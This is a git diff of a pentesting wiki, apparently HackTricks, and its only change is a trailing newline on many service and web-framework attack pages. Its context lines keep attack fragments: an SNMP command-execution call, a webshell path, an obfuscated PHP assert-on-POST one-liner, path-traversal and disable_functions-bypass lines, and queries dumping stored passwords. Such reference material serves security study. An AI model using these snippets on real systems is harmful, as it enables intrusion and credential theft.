index ae699bdd4..dbec1ab86 100644 --- a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -50,3 +50,4 @@ If you are interested in **hacking career** and hack the unhackable - **we are h {% embed url="https://www.stmcyber.com/careers" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md index 7d5ae047d..b249bff47 100644 --- a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md +++ b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md @@ -54,3 +54,4 @@ snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendSta - [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md index f95d660d4..0cc265c2e 100644 --- a/src/network-services-pentesting/pentesting-ssh.md +++ b/src/network-services-pentesting/pentesting-ssh.md @@ -349,3 +349,4 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 36707af7e..1d1ad836c 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -93,3 +93,4 @@ Entry_4: {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-vnc.md b/src/network-services-pentesting/pentesting-vnc.md index ac11bb5dd..1a52627f4 100644 --- a/src/network-services-pentesting/pentesting-vnc.md +++ b/src/network-services-pentesting/pentesting-vnc.md @@ -62,3 +62,4 @@ If you are interested in **hacking career** and hack the unhackable - **we are h {% embed url="https://www.stmcyber.com/careers" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-voip/README.md b/src/network-services-pentesting/pentesting-voip/README.md index 329de4baa..900718d60 100644 --- a/src/network-services-pentesting/pentesting-voip/README.md +++ b/src/network-services-pentesting/pentesting-voip/README.md @@ -703,3 +703,4 @@ The easiest way to install a software such as Asterisk is to download an **OS di - [https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index 98332bf66..11f915c66 100644 --- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -95,3 +95,4 @@ SDP's simplicity and flexibility make it a widely adopted standard for describin These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks. {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md index dffb666db..be96c111a 100644 --- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md +++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md @@ -241,3 +241,4 @@ After the registrar server verifies the provided credentials, **it sends a "200 > It's not mentioned, but User B needs to have sent a **REGISTER message to Proxy 2** before he is able to receive calls. {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md index cadae326e..0b1a0dc1b 100644 --- a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md +++ b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md @@ -133,3 +133,4 @@ guest guest {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index 07282f5fe..3ac0a63bb 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -437,3 +437,4 @@ Entry_12: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md index 71a9ec989..f5e797797 100644 --- a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md +++ b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md @@ -3,3 +3,4 @@ Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/angular.md b/src/network-services-pentesting/pentesting-web/angular.md index efabb8d3a..e50e7f285 100644 --- a/src/network-services-pentesting/pentesting-web/angular.md +++ b/src/network-services-pentesting/pentesting-web/angular.md @@ -612,3 +612,4 @@ According to the W3C documentation, the `window.location` and `document.location * [Angular Location](https://angular.io/api/common/Location) * [Angular Router](https://angular.io/api/router/Router) + diff --git a/src/network-services-pentesting/pentesting-web/apache.md b/src/network-services-pentesting/pentesting-web/apache.md index cf2ce9e9a..fa18deb04 100644 --- a/src/network-services-pentesting/pentesting-web/apache.md +++ b/src/network-services-pentesting/pentesting-web/apache.md @@ -276,3 +276,4 @@ Check [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker - [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md index 49dbd8f67..c76ce0ddd 100644 --- a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md +++ b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md @@ -3,3 +3,4 @@ **Check this post:** [**https://www.errno.fr/artifactory/Attacking_Artifactory**](https://www.errno.fr/artifactory/Attacking_Artifactory) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/bolt-cms.md b/src/network-services-pentesting/pentesting-web/bolt-cms.md index dfc0cdeb0..fade5a8db 100644 --- a/src/network-services-pentesting/pentesting-web/bolt-cms.md +++ b/src/network-services-pentesting/pentesting-web/bolt-cms.md @@ -23,3 +23,4 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in - Access again the page as a regular user, and the payload should be executed {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index d09f1c5a2..cc87f7985 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -7,3 +7,4 @@ Check this page if you want to learn more about enumerating and abusing Buckets: {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index bfe7b12da..d9b3a0272 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -11,3 +11,4 @@ Learn more about Firebase in: {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index 65a75a1f6..c884aaf34 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md @@ -90,3 +90,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/code-review-tools.md b/src/network-services-pentesting/pentesting-web/code-review-tools.md index c4d0c4550..299e4b84f 100644 --- a/src/network-services-pentesting/pentesting-web/code-review-tools.md +++ b/src/network-services-pentesting/pentesting-web/code-review-tools.md @@ -456,3 +456,4 @@ https://github.com/securego/gosec - [https://github.com/jshint/jshint/](https://github.com/jshint/jshint/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/django.md b/src/network-services-pentesting/pentesting-web/django.md index 27a978049..929728956 100644 --- a/src/network-services-pentesting/pentesting-web/django.md +++ b/src/network-services-pentesting/pentesting-web/django.md @@ -7,3 +7,4 @@ Django cache is stored in one of four places: [Redis](https://github.com/django/ This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436 + diff --git a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index 91d546943..c588de1ce 100644 --- a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -42,3 +42,4 @@ Then access to **`/Portals/0/shell.asp`** to access your webshell. You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/drupal/README.md b/src/network-services-pentesting/pentesting-web/drupal/README.md index b8cc634fb..d728e6da4 100644 --- a/src/network-services-pentesting/pentesting-web/drupal/README.md +++ b/src/network-services-pentesting/pentesting-web/drupal/README.md @@ -104,3 +104,4 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from {% embed url="https://websec.nl/" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md b/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md index 99768504e..0133fcea6 100644 --- a/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md +++ b/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md @@ -241,3 +241,4 @@ And as you can see in the logs, it looks like only a txt file has been requested Thank you for taking the time to read this article, I hope it will help you get some shells. {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index bb194b9b4..dc07d93ec 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -343,3 +343,4 @@ npm start - [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index 38bd12557..e4c468753 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -61,3 +61,4 @@ Exploit:
{{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md index 55eb6de82..870f8775d 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md @@ -105,3 +105,4 @@ window.electronSend = (event, data) => { ``` {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md index 3ca885393..dffbbf747 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md @@ -88,3 +88,4 @@ Specifically, the argument is replaced by changing the following two parts. [https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55](https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md index d454131c5..13e77b711 100644 --- a/src/network-services-pentesting/pentesting-web/flask.md +++ b/src/network-services-pentesting/pentesting-web/flask.md @@ -114,3 +114,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/git.md b/src/network-services-pentesting/pentesting-web/git.md index 0a7edf47b..584133e1b 100644 --- a/src/network-services-pentesting/pentesting-web/git.md +++ b/src/network-services-pentesting/pentesting-web/git.md @@ -21,3 +21,4 @@ The tool [https://github.com/michenriksen/gitrob](https://github.com/michenrikse Here you can find an study about github dorks: [https://securitytrails.com/blog/github-dorks](https://securitytrails.com/blog/github-dorks) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/golang.md b/src/network-services-pentesting/pentesting-web/golang.md index 4b2bbfdc2..fea1ae641 100644 --- a/src/network-services-pentesting/pentesting-web/golang.md +++ b/src/network-services-pentesting/pentesting-web/golang.md @@ -19,3 +19,4 @@ curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag [https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go\#L2354-L2364](https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/grafana.md b/src/network-services-pentesting/pentesting-web/grafana.md index 175cbd978..85490d838 100644 --- a/src/network-services-pentesting/pentesting-web/grafana.md +++ b/src/network-services-pentesting/pentesting-web/grafana.md @@ -11,3 +11,4 @@ - `select user,password,database from data_source;` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md index 08e2f623c..8bcb47be2 100644 --- a/src/network-services-pentesting/pentesting-web/graphql.md +++ b/src/network-services-pentesting/pentesting-web/graphql.md @@ -649,3 +649,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md b/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md index b6a87fda9..e449401e1 100644 --- a/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md +++ b/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md @@ -1,3 +1,4 @@ # GWT - Google Web Toolkit + diff --git a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md index a206a08c9..e9a3d89b4 100644 --- a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md +++ b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md @@ -40,3 +40,4 @@ In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md index abb1cd40a..3ecb7ca41 100644 --- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -274,3 +274,4 @@ HTTP/1.1 200 OK ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/imagemagick-security.md b/src/network-services-pentesting/pentesting-web/imagemagick-security.md index 852628f55..985c0d262 100644 --- a/src/network-services-pentesting/pentesting-web/imagemagick-security.md +++ b/src/network-services-pentesting/pentesting-web/imagemagick-security.md @@ -48,3 +48,4 @@ The effectiveness of a security policy can be confirmed using the `identify -lis - [https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html\*\*](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/jboss.md b/src/network-services-pentesting/pentesting-web/jboss.md index df32740ad..f4a8253f0 100644 --- a/src/network-services-pentesting/pentesting-web/jboss.md +++ b/src/network-services-pentesting/pentesting-web/jboss.md @@ -32,3 +32,4 @@ Google Dorking can aid in identifying vulnerable servers with a query like: `inu {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/jira.md b/src/network-services-pentesting/pentesting-web/jira.md index 41b7491ac..b0f79c2d9 100644 --- a/src/network-services-pentesting/pentesting-web/jira.md +++ b/src/network-services-pentesting/pentesting-web/jira.md @@ -127,3 +127,4 @@ If you are interested in **hacking career** and hack the unhackable - **we are h {% embed url="https://www.stmcyber.com/careers" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/joomla.md b/src/network-services-pentesting/pentesting-web/joomla.md index ceb579a30..da6d5c76b 100644 --- a/src/network-services-pentesting/pentesting-web/joomla.md +++ b/src/network-services-pentesting/pentesting-web/joomla.md @@ -132,3 +132,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/jsp.md b/src/network-services-pentesting/pentesting-web/jsp.md index 0b28da3ec..971a6f93f 100644 --- a/src/network-services-pentesting/pentesting-web/jsp.md +++ b/src/network-services-pentesting/pentesting-web/jsp.md @@ -15,3 +15,4 @@ Accessing that web you may change all the links to request the information to _* ![](<../../images/image (326).png>) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index d8dc6e617..7cdab798a 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -112,3 +112,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/moodle.md b/src/network-services-pentesting/pentesting-web/moodle.md index 200c90750..8bce4fa53 100644 --- a/src/network-services-pentesting/pentesting-web/moodle.md +++ b/src/network-services-pentesting/pentesting-web/moodle.md @@ -117,3 +117,4 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php" {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nextjs-1.md b/src/network-services-pentesting/pentesting-web/nextjs-1.md index 5bfc6fbea..b9629e651 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs-1.md +++ b/src/network-services-pentesting/pentesting-web/nextjs-1.md @@ -3,3 +3,4 @@ {{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md index 66340dac4..436429a8d 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs.md +++ b/src/network-services-pentesting/pentesting-web/nextjs.md @@ -1268,3 +1268,4 @@ const HeavyComponent = dynamic(() => import("../components/HeavyComponent"), { ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md index 2a639687f..9b84ed424 100644 --- a/src/network-services-pentesting/pentesting-web/nginx.md +++ b/src/network-services-pentesting/pentesting-web/nginx.md @@ -311,3 +311,4 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nodejs-express.md b/src/network-services-pentesting/pentesting-web/nodejs-express.md index 49e133266..b8ff2e526 100644 --- a/src/network-services-pentesting/pentesting-web/nodejs-express.md +++ b/src/network-services-pentesting/pentesting-web/nodejs-express.md @@ -36,3 +36,4 @@ iI you know the secret you can sign a the cookie. cookie-monster -e -f new_cookie.json -k secret ``` + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index 43e9dc029..bf5c9e25e 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md @@ -520,3 +520,4 @@ $___($_[_]); // ASSERT($_POST[_]); {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md index 494a25faa..352e94291 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md @@ -102,3 +102,4 @@ A method described in the [**original writeup**](https://swarm.ptsecurity.com/ex - [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md index e2efdf784..6c09dfe4e 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md @@ -68,3 +68,4 @@ $file = file_get_contents($url, false, $context); ``` {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md index 6b862299a..391d24098 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md @@ -819,3 +819,4 @@ get_meta_tags ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md index 2e8d436d9..e1a9e4511 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md @@ -85,3 +85,4 @@ The [dl function](http://www.php.net/manual/en/function.dl.php) is used to load This detailed walkthrough outlines the process of creating and deploying a PHP extension to execute system commands, exploiting the `dl` function, which should ideally be disabled to prevent such security breaches. {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md index 252cd9fcb..4b467d782 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md @@ -55,3 +55,4 @@ echo file_get_contents($data_file); ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md index fa4dc4bae..dafe40efa 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md @@ -45,3 +45,4 @@ else ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md index a42d9820b..4295cfaa1 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md @@ -29,3 +29,4 @@ if(function_exists('pcntl_exec')) { ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md index ff740c105..1730e8742 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md @@ -9,3 +9,4 @@ php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");' ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md index bf6cf1661..758ab6f27 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md @@ -29,3 +29,4 @@ win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md 